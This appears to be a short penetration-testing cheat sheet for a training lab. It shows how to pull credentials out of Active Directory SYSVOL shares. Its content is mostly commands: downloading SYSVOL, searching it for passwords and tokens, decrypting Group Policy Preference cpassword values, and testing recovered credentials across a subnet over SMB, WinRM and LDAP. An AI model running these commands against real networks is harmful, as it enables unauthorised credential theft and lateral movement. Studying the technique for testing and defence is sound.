GPO secrets are credentials and configuration data exposed through SYSVOL. Every domain user can normally read SYSVOL, so old Group Policy Preference XML, scripts, registry policy files, and operational configuration become a common first credential-access stop.
List SYSVOL
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; ls'
Download SYSVOL
mkdir -p sysvol
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; prompt OFF; mget *'
Search for secrets
grep -RniE 'cpassword|password|passwd|pwd|secret|token|apikey|connectionString' sysvol/
find sysvol -iname 'Groups.xml' -o -iname 'Services.xml' -o -iname 'ScheduledTasks.xml' -o -iname 'Drives.xml' -o -iname 'DataSources.xml' -o -iname 'Registry.xml'
Windows search
Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include *.xml,*.ini,*.txt,*.ps1,*.bat,*.vbs,*.config |
Select-String -Pattern "cpassword","password","passwd","pwd","secret","token","apikey","connectionString"
Classic files
Groups.xml
Services.xml
ScheduledTasks.xml
Printers.xml
Drives.xml
DataSources.xml
Registry.xml
Decrypt GPP cpassword
gpp-decrypt '<cpassword_value>'
Validate recovered credentials
nxc smb 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc winrm 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc ldap 10.10.10.200 -u recovered_user -p 'RecoveredPassword!'
Other useful policy files
Registry.pol
GptTmpl.inf
Scripts\Startup\*.bat
Scripts\Startup\*.ps1
Scripts\Logon\*.bat
Scripts\Logon\*.vbs
Machine\Preferences\Registry\Registry.xml
User\Preferences\Drives\Drives.xml
Notes
This overlaps with GPO enumeration, but the goal here is credential recovery rather than policy abuse.
Old cpassword values are decryptable because the AES key is public. Even stale credentials deserve validation because password reuse often keeps them alive.